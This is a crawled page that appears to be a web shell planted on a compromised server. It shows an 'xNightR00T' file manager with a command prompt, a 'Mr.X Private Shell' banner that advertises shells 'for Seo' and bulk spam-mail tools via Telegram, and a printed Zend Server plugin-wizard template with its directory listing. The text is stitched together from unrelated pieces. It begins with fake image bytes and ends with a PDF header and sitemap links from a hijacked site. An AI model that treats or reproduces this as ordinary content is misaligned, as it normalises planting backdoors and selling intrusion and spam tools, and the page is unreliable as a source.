xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<script type="text/javascript">
    function checkDownloadStatus() {
        // prevent to check download if window was closed
        if (!allowAutoPolling) {
            return;
        }

        var url = '<?php echo $this->basepath('/Api/deploymentDownloadFileStatus') ?>';
        var request = new Request.WebAPI({
            url: url,
            data: {url: '<?php echo $url; ?>'},
            onSuccess: function (response) {
                var data = response.responseData;

                if (!$('downloadProgressValue')) {
                    //In case user has closed the installation dialog but request not completed
                    return;
                }

                if (data.status == 'downloading') {
                    if (data.size > 0 && data.downloaded > 0) {
                        var precent = Math.floor((data.downloaded / data.size) * 100);
                        $('downloadProgressValue').set('text', precent + '%');
                        $('progressbar').set('value', precent);

                        var sizeInKB = (data.size / (1024)).toFixed(1);
                        var downloadedInKB = (data.downloaded / (1024)).toFixed(1);
                        $('downloadProgressSize').set('text', downloadedInKB + '/' + sizeInKB + ' KB');
                    }

                    setTimeout(function () {
                        checkDownloadStatus();
                    }, 1000);
                } else if (data.status == 'error') {
                    $('downloadProgressBar').addClass('hidden');
                    $('downloadErrorContainer').removeClass('hidden');
                    $('downloadErrorMessage').set('text', data.message);
                } else if (data.status == 'ok') {
                    $('downloadProgressValue').set('text', '100%');
                    $('progressbar').set('value', 100);

                    var sizeInKB = (data.size / (1024)).toFixed(1);
                    $('downloadProgressSize').set('text', sizeInKB + '/' + sizeInKB + ' KB');

                    // call to load the package
                    var myRequest = new Request({
                        data: {path: data.path},
                        url: '<?php echo $this->url('default',
    array('controller' => 'PluginsWizard', 'action' => 'finishDownload'));
?>?wizardId=<?php echo $wizardId; ?>',
                            async: false,
                            evalScripts: true,
                            onComplete: function (response) {
                            }
                        }).send();

                    } else {
                        setTimeout(function () {
                            checkDownloadStatus();
                        }, 1000);
                    }
                },
                onFailure: function (response) {
                    var responseData = this.decodeResponse(response);
                    document.fireEvent('toastAlert', {'message': _t("Failed to download a deployment package: {error}", {'error': responseData.errorData.errorMessage})});
                }
            }).get();
        }

        function retry() {
            // prevent to check download if window was closed
            if (!allowAutoPolling) {
                return;
            }

            $('downloadProgressBar').removeClass('hidden');
            $('downloadErrorContainer').addClass('hidden');

            // reset progress
            $('downloadProgressValue').set('text', '0%');
            $('progressbar').set('value', 0);
            $('downloadProgressSize').set('text', '');

            var url = '<?php echo $this->basepath('/Api/deploymentDownloadFile') ?>?wizardId=<?php echo $wizardId; ?>';
                    var request = new Request.WebAPI({
                        data: {url: '<?php echo $url; ?>', name: '<?php echo $name; ?>', version: '<?php echo $version; ?>', 'override': 'TRUE'},
                        url: url,
                        onComplete: function (response) {
                            checkDownloadStatus();
                        },
                        onFailure: function (response) {
                            var responseData = this.decodeResponse(response);
                            document.fireEvent('toastAlert', {'message': _t(failedMessage, responseData.errorData)});
                        }
                    }).post();
                }

                allowAutoPolling = true;
</script>

<?php if (!$allowDownloading) : ?>
    <div id="downloadNotAllowedContainer">
        <div class="wizard-inner-error">
            <?php $enableUrl           = '<a href="'.$this->basepath('/ZendComponents/#search=&grid=Zend--Deployment').'">'._t('enable').'</a>'; ?>
            <?php $manuallyDownloadUrl = '<a href="'.$url.'">'._t('download').'</a>'; ?>

            <?php
            if (isZrayStandaloneEnv()) {
                $deploymentIniPath = getCfgVar("zend.conf_dir").DIRECTORY_SEPARATOR.'deployment.ini';
                $managePluginsPage = '<a href="'.$this->basepath('/Plugins').'">Manage Plugins page</a>';
                echo _t('Failed to download plugin package - Z-Ray Automatic Download is disabled.'.
                    'You can either enable this feature by manually setting "zend_deployment.auto_download=1" '.
                    'in the file %s and retry the automatic download process, or manually %s the plugin '.
                    'package and deploy it through %s.',
                    array($deploymentIniPath, $manuallyDownloadUrl, $managePluginsPage));
            } else {
                echo _t('Failed to download plugin package - Zend Server Automatic Download is disabled. You can either %s this feature and retry the automatic download process, or manually %s the plugin package.',
                    array($enableUrl, $manuallyDownloadUrl));
            }
            ?><br/>
        </div>
    </div>
<?php else : ?>

    <div class="progress-bar-wrapper" id="downloadProgressBar">
        Zend Server is downloading <?php echo (empty($version)) ? $name : $name.' version '.$version; ?> ... <br/><br/>
        <progress id="progressbar" value="0" max="100"></progress>
        <span class="progress-value" id="downloadProgressValue">0%</span>
        <span class="progress-size" id="downloadProgressSize"></span>
    </div>

    <div id="downloadErrorContainer" class="hidden">
        <div class="wizard-inner-error">
    <?php echo _t('Zend Server failed to download the plugin package.'); ?><br/>
            <span id="downloadErrorMessage"></span>
        </div>
        <br/>
        <a href="javascript:void(0);" onclick="retry()">Retry</a> or <a href="<?php echo $url; ?>">download manually</a>
    </div>

<?php endif; ?>

<script type="text/javascript">
<?php if ($allowDownloading) : ?>
        checkDownloadStatus();
<?php endif; ?>
</script>

Filemanager

Name Type Size Permission Actions
cancel.phtml File 53 B 0644
deploy.phtml File 58 B 0644
download.phtml File 6.71 KB 0644
eula.phtml File 1 KB 0644
finish-download.phtml File 264 B 0644
index.phtml File 17 B 0644
installation.phtml File 1.85 KB 0644
prerequisites.phtml File 1.92 KB 0644
readme.phtml File 151 B 0644
submit.phtml File 53 B 0644
summary.phtml File 569 B 0644
update.phtml File 0 B 0644
upload-update.phtml File 204 B 0644
upload.phtml File 204 B 0644
uploader.phtml File 1.92 KB 0644
wizard.phtml File 10.9 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml